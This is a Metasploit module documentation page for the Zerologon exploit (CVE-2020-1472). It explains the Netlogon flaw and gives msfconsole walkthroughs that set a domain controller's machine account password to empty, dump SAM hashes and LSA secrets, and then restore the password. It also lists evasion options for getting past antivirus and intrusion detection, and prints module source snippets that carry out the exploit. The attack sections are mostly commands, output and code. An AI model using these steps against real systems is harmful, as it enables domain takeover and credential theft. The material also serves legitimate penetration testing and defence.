Netlogon Weak Cryptographic Authentication - Metasploit
This page contains detailed information about how to use the auxiliary/admin/dcerpc/cve_2020_1472_zerologon metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Netlogon Weak Cryptographic Authentication
Module: auxiliary/admin/dcerpc/cve_2020_1472_zerologon
Source code: modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb
Disclosure date: -
Last modification time: 2022-08-03 14:27:30 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2020-1472
This module is also known as Zerologon.
A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account password to an empty string, which will then allow the attacker to authenticate as the machine account. After exploitation, it's important to restore this password to it's original value. Failure to do so can result in service instability.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf auxiliary(cve_2020_1472_zerologon) > show targets
... a list of targets ...
msf auxiliary(cve_2020_1472_zerologon) > set TARGET target-id
msf auxiliary(cve_2020_1472_zerologon) > show options
... show and set options ...
msf auxiliary(cve_2020_1472_zerologon) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
NBNAME: The server's NetBIOS name
Knowledge Base
Vulnerable Application
A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account password to an empty string, which will then allow the attacker to authenticate as the machine account. After exploitation, it's important to restore this password to it's original value. Failure to do so can result in service instability.
The auxiliary/gather/windows_secrets_dump
module can be used to recover the original machine account password which
can then be restored with this module by using the RESTORE
action and setting the PASSWORD
value.
Verification Steps
- Exploit the vulnerability to remove the machine account password by replacing it with an empty string
- From msfconsole
- Do:
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
- Set the
RHOSTS
andNBNAME
values - Run the module and see that the original machine account password was removed
- Recover the original machine account password
- Do:
use auxiliary/gather/windows_secrets_dump
- Set the
RHOSTS
values - Set the
SMBUser
option to the NetBIOS name with a trailing$
, e.g.NBNAME$
- Set the
SMBPass
option toaad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
(the hash of an empty password) - Run the module and search for the password in the output (
NBNAME$:plain_password_hex:
)
- Do:
- Restore the original machine account password
- From msfconsole
- Do:
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
- Set the action to
RESTORE
- Set the
RHOSTS
,NBNAME
andPASSWORD
values - Run the module and see that the original value was restored
Options
NBNAME
The NetBIOS name of the target domain controller. You can use the auxiliary/scanner/netbios/nbname
module to obtain
this value. If this value is invalid the module will fail when making a Netlogon RPC request.
PASSWORD
The hex value of the original machine account password. This value is typically recovered from the target system's
registry (such as by using the auxiliary/gather/windows_secrets_dump
Metasploit module) after successfully setting the
value to an empty string within Active Directory using this module and the default REMOVE
action.
This value is only used when running the module with the RESTORE
action.
Scenarios
Windows Server 2019
First, exploit the vulnerability to remove the machine account password by replacing it with an empty string.
msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.159.53
RHOSTS => 192.168.159.53
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME WIN-GD5KVDKUNIP
NBNAME => WIN-GD5KVDKUNIP
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options
Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
Name Current Setting Required Description
---- --------------- -------- -----------
NBNAME WIN-GD5KVDKUNIP yes The server's NetBIOS name
RHOSTS 192.168.159.53 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT no The netlogon RPC port (TCP)
Auxiliary action:
Name Description
---- -----------
REMOVE Remove the machine account password
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.159.53
[*] 192.168.159.53: - Connecting to the endpoint mapper service...
[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[+] 192.168.159.53:6403 - Successfully authenticated
[+] 192.168.159.53:6403 - Successfully set the machine account (WIN-GD5KVDKUNIP$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
At this point the exploit/windows/smb/psexec
module can be used to achieve code execution if desired. Set the SMBUser
option to the
machine account and the SMBPass
option to the empty password value.
Next, recover the original machine account password value using auxiliary/gather/windows_secrets_dump
. Look for the plain_password_hex
value in the $MACHINE.ACC
section.
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.53
RHOSTS => 192.168.159.53
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser WIN-GD5KVDKUNIP$
SMBUser => WIN-GD5KVDKUNIP$
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.159.53
[*] 192.168.159.53:445 - Service RemoteRegistry is already running
[*] 192.168.159.53:445 - Retrieving target system bootKey
[+] 192.168.159.53:445 - bootKey: 0xa11f7c33c8bab9e427dec59436dbb17d
[*] 192.168.159.53:445 - Saving remote SAM database
[*] 192.168.159.53:445 - Dumping SAM hashes
[*] 192.168.159.53:445 - Password hints:
No users with password hints on this system
[*] 192.168.159.53:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6df12cddaa88057f06a80b5ee73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
[*] 192.168.159.53:445 - Saving remote SECURITY database
[*] 192.168.159.53:445 - Decrypting LSA Key
[*] 192.168.159.53:445 - Dumping LSA Secrets
$MACHINE.ACC
EXCHG\WIN-GD5KVDKUNIP$:plain_password_hex:4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
EXCHG\WIN-GD5KVDKUNIP$:aes256-cts-hmac-sha1-96:127c328739d4406e6734684b971709acb2215f947b961355fa25b9b3fda38a08
EXCHG\WIN-GD5KVDKUNIP$:aes128-cts-hmac-sha1-96:becbe21ab050ccb1d8a5b908839fd95f
EXCHG\WIN-GD5KVDKUNIP$:des-cbc-md5:b5f843cec2e56220
EXCHG\WIN-GD5KVDKUNIP$:aad3b435b51404eeaad3b435b51404ee:ec3a7fa2158f1f705898d538ad3aafaf:::
...
[*] 192.168.159.53:445 - Decrypting NL$KM
[*] 192.168.159.53:445 - Dumping cached hashes
No cached hashes on this system
[*] 192.168.159.53:445 - Cleaning up...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) >
Finally, restore the original value using this module.
msf6 auxiliary(gather/windows_secrets_dump) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE
ACTION => RESTORE
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
PASSWORD => 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options
Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
Name Current Setting Required Description
---- --------------- -------- -----------
NBNAME WIN-GD5KVDKUNIP yes The server's NetBIOS name
PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d no The password to restore for the machine account (in hex)
RHOSTS 192.168.159.53 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT no The netlogon RPC port (TCP)
Auxiliary action:
Name Description
---- -----------
RESTORE Restore the machine account password
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.159.53
[*] 192.168.159.53: - Connecting to the endpoint mapper service...
[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[+] 192.168.159.53:6403 - Successfully set machine account (WIN-GD5KVDKUNIP$) password
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
Go back to menu.
Msfconsole Usage
Here is how the admin/dcerpc/cve_2020_1472_zerologon auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show info
Name: Netlogon Weak Cryptographic Authentication
Module: auxiliary/admin/dcerpc/cve_2020_1472_zerologon
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Tom Tervoort
Spencer McIntyre
Dirk-jan Mollema
Available actions:
Name Description
---- -----------
REMOVE Remove the machine account password
RESTORE Restore the machine account password
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
NBNAME yes The server's NetBIOS name
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT no The netlogon RPC port (TCP)
Description:
A vulnerability exists within the Netlogon authentication process
where the security properties granted by AES are lost due to an
implementation flaw related to the use of a static initialization
vector (IV). An attacker can leverage this flaw to target an Active
Directory Domain Controller and make repeated authentication
attempts using NULL data fields which will succeed every 1 in 256
tries (~0.4%). This module leverages the vulnerability to reset the
machine account password to an empty string, which will then allow
the attacker to authenticate as the machine account. After
exploitation, it's important to restore this password to it's
original value. Failure to do so can result in service instability.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-1472
https://www.secura.com/blog/zero-logon
https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py
https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py
Also known as:
Zerologon
Module Options
This is a complete list of options available in the admin/dcerpc/cve_2020_1472_zerologon auxiliary module:
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options
Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
Name Current Setting Required Description
---- --------------- -------- -----------
NBNAME yes The server's NetBIOS name
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT no The netlogon RPC port (TCP)
Auxiliary action:
Name Description
---- -----------
REMOVE Remove the machine account password
Advanced Options
Here is a complete list of advanced options supported by the admin/dcerpc/cve_2020_1472_zerologon auxiliary module:
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show advanced
Module advanced options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
DCERPC::ReadTimeout 10 yes The number of seconds to wait for DCERPC responses
NTLM::SendLM true yes Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM true yes Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN true yes Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
NTLM::UseLMKey false yes Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session true yes Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 true yes Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SMB::AlwaysEncrypt true yes Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
SMB::ChunkSize 500 yes The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM Windows 2000 5.0 yes The Native LM to send during authentication
SMB::Native_OS Windows 2000 2195 yes The Native OS to send during authentication
SMB::ProtocolVersion 1,2,3 yes One or a list of coma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
SMB::VerifySignature false yes Enforces client-side verification of server response signatures
SMBDirect true no The target port is a raw SMB service (not NetBIOS)
SMBDomain . no The Windows domain to use for authentication
SMBName *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/dcerpc/cve_2020_1472_zerologon module can do:
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show actions
Auxiliary actions:
Name Description
---- -----------
REMOVE Remove the machine account password
RESTORE Restore the machine account password
Evasion Options
Here is the full list of possible evasion options supported by the admin/dcerpc/cve_2020_1472_zerologon auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
DCERPC::fake_bind_multi true no Use multi-context bind calls
DCERPC::fake_bind_multi_append 0 no Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend 0 no Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size 4096 yes Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio rw no Use a different delivery method for accessing named pipes (Accepted: rw, trans)
SMB::obscure_trans_pipe_level 0 yes Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3)
SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion false yes Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe reads
SMB::pipe_read_min_size 1 yes Minimum buffer size for pipe reads
SMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writes
SMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writes
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Could not determine the RPC port used by the Microsoft Netlogon Server
- Failed to authenticate to the server by leveraging the vulnerability
- Password change failed with NT status: 0x<STATUS.TO_S-16>
- The RESTORE action requires the PASSWORD option to be set
- The PASSWORD option must be in hex
- Failed to authenticate (the machine account password may not be empty)
- Password change failed with NT status: 0x<STATUS.TO_S-16>
- The <NAME> Netlogon RPC request failed
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Could not determine the RPC port used by the Microsoft Netlogon Server
Here is a relevant code snippet related to the "Could not determine the RPC port used by the Microsoft Netlogon Server" error message:
65:
66: def bind_to_netlogon_service
67: @dport = datastore['RPORT']
68: if @dport.nil? || @dport == 0
69: @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')
70: fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport
71: end
72:
73: # Bind to the service
74: handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])
75: print_status("Binding to #{handle} ...")
Failed to authenticate to the server by leveraging the vulnerability
Here is a relevant code snippet related to the "Failed to authenticate to the server by leveraging the vulnerability" error message:
101: action_restore_password
102: end
103: end
104:
105: def action_remove_password
106: fail_with(Failure::Unknown, 'Failed to authenticate to the server by leveraging the vulnerability') unless check == CheckCode::Vulnerable
107:
108: print_good('Successfully authenticated')
109:
110: report_vuln(
111: host: rhost,
Password change failed with NT status: 0x<STATUS.TO_S-16>
Here is a relevant code snippet related to the "Password change failed with NT status: 0x<STATUS.TO_S-16>" error message:
117: info: "Module #{fullname} successfully authenticated to the server without knowledge of the shared secret"
118: )
119:
120: response = netr_server_password_set2
121: status = response.error_status.to_i
122: fail_with(Failure::UnexpectedReply, "Password change failed with NT status: 0x#{status.to_s(16)}") unless status == 0
123:
124: print_good("Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)")
125: end
126:
127: def action_restore_password
The RESTORE action requires the PASSWORD option to be set
Here is a relevant code snippet related to the "The RESTORE action requires the PASSWORD option to be set" error message:
123:
124: print_good("Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)")
125: end
126:
127: def action_restore_password
128: fail_with(Failure::BadConfig, 'The RESTORE action requires the PASSWORD option to be set') if datastore['PASSWORD'].blank?
129: fail_with(Failure::BadConfig, 'The PASSWORD option must be in hex') if /^([0-9a-fA-F]{2})+$/ !~ datastore['PASSWORD']
130: password = [datastore['PASSWORD']].pack('H*')
131:
132: bind_to_netlogon_service
133: client_challenge = OpenSSL::Random.random_bytes(8)
The PASSWORD option must be in hex
Here is a relevant code snippet related to the "The PASSWORD option must be in hex" error message:
124: print_good("Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)")
125: end
126:
127: def action_restore_password
128: fail_with(Failure::BadConfig, 'The RESTORE action requires the PASSWORD option to be set') if datastore['PASSWORD'].blank?
129: fail_with(Failure::BadConfig, 'The PASSWORD option must be in hex') if /^([0-9a-fA-F]{2})+$/ !~ datastore['PASSWORD']
130: password = [datastore['PASSWORD']].pack('H*')
131:
132: bind_to_netlogon_service
133: client_challenge = OpenSSL::Random.random_bytes(8)
134:
Failed to authenticate (the machine account password may not be empty)
Here is a relevant code snippet related to the "Failed to authenticate (the machine account password may not be empty)" error message:
135: response = netr_server_req_challenge(client_challenge: client_challenge)
136: session_key = Netlogon.calculate_session_key(EMPTY_SHARED_SECRET, client_challenge, response.server_challenge)
137: ppp = Netlogon.encrypt_credential(session_key, client_challenge)
138:
139: response = netr_server_authenticate3(client_credential: ppp)
140: fail_with(Failure::NoAccess, 'Failed to authenticate (the machine account password may not be empty)') unless response.error_status == 0
141:
142: new_password_data = ("\x00" * (512 - password.length)) + password + [password.length].pack('V')
143: response = netr_server_password_set2(
144: authenticator: Netlogon::NetlogonAuthenticator.new(
145: credential: Netlogon.encrypt_credential(session_key, [ppp.unpack1('Q') + 10].pack('Q')),
Password change failed with NT status: 0x<STATUS.TO_S-16>
Here is a relevant code snippet related to the "Password change failed with NT status: 0x<STATUS.TO_S-16>" error message:
146: timestamp: 10
147: ),
148: clear_new_password: Netlogon.encrypt_credential(session_key, new_password_data)
149: )
150: status = response.error_status.to_i
151: fail_with(Failure::UnexpectedReply, "Password change failed with NT status: 0x#{status.to_s(16)}") unless status == 0
152:
153: print_good("Successfully set machine account (#{datastore['NBNAME']}$) password")
154: end
155:
156: def netr_server_authenticate3(client_credential: "\x00" * 8)
The <NAME> Netlogon RPC request failed
Here is a relevant code snippet related to the "The <NAME> Netlogon RPC request failed" error message:
185: request = Netlogon.const_get("#{name}Request").new(**kwargs)
186:
187: begin
188: raw_response = dcerpc.call(request.opnum, request.to_binary_s)
189: rescue Rex::Proto::DCERPC::Exceptions::Fault
190: fail_with(Failure::UnexpectedReply, "The #{name} Netlogon RPC request failed")
191: end
192:
193: Netlogon.const_get("#{name}Response").read(raw_response)
194: end
195: end
Go back to menu.
Related Pull Requests
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14204 Merged Pull Request: Update the module docs for CVE-2020-1472 (Zerologon)
- #14151 Merged Pull Request: Add exploit (aux/admin) for CVE-2020-1472 (AKA: Zerologon)
References
- CVE-2020-1472
- https://www.secura.com/blog/zero-logon
- https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py
- https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py
See Also
Check also the following modules related to this module:
- auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/admin/dcerpc/icpr_cert
- auxiliary/admin/dcerpc/samr_computer
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/scanner/rdp/cve_2019_0708_bluekeep
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
- auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
- auxiliary/scanner/dcerpc/dfscoerce
- auxiliary/scanner/dcerpc/endpoint_mapper
- auxiliary/scanner/dcerpc/hidden
- auxiliary/scanner/dcerpc/management
- auxiliary/scanner/dcerpc/petitpotam
- auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
- auxiliary/scanner/dcerpc/windows_deployment_services
- exploit/windows/dcerpc/cve_2021_1675_printnightmare
- exploit/windows/dcerpc/ms03_026_dcom
- exploit/windows/dcerpc/ms05_017_msmq
- exploit/windows/dcerpc/ms07_029_msdns_zonename
- exploit/windows/dcerpc/ms07_065_msmq
- auxiliary/scanner/smb/pipe_dcerpc_auditor
- exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection
- exploit/linux/misc/cve_2020_13160_anydesk
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/windows/local/cve_2020_0668_service_tracing
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/cve_2020_0796_smbghost
- exploit/windows/local/cve_2020_1048_printerdemon
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/windows/local/cve_2020_1313_system_orchestrator
- exploit/windows/local/cve_2020_1337_printerdemon
- exploit/windows/local/cve_2020_17136
- exploit/windows/smb/cve_2020_0796_smbghost
Related Nessus plugins:
- KB4565349: Windows 10 Version 1809 and Windows Server 2019 August 2020 Security Update
- KB4571694: Windows 10 Version 1607 and Windows Server 2016 August 2020 Security Update
- KB4571723: Windows 8.1 and Windows Server 2012 R2 August 2020 Security Update
- KB4571719: Windows 7 and Windows Server 2008 R2 August 2020 Security Update
- KB4571702: Windows Server 2012 August 2020 Security Update
Authors
- Tom Tervoort
- Spencer McIntyre
- Dirk-jan Mollema
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.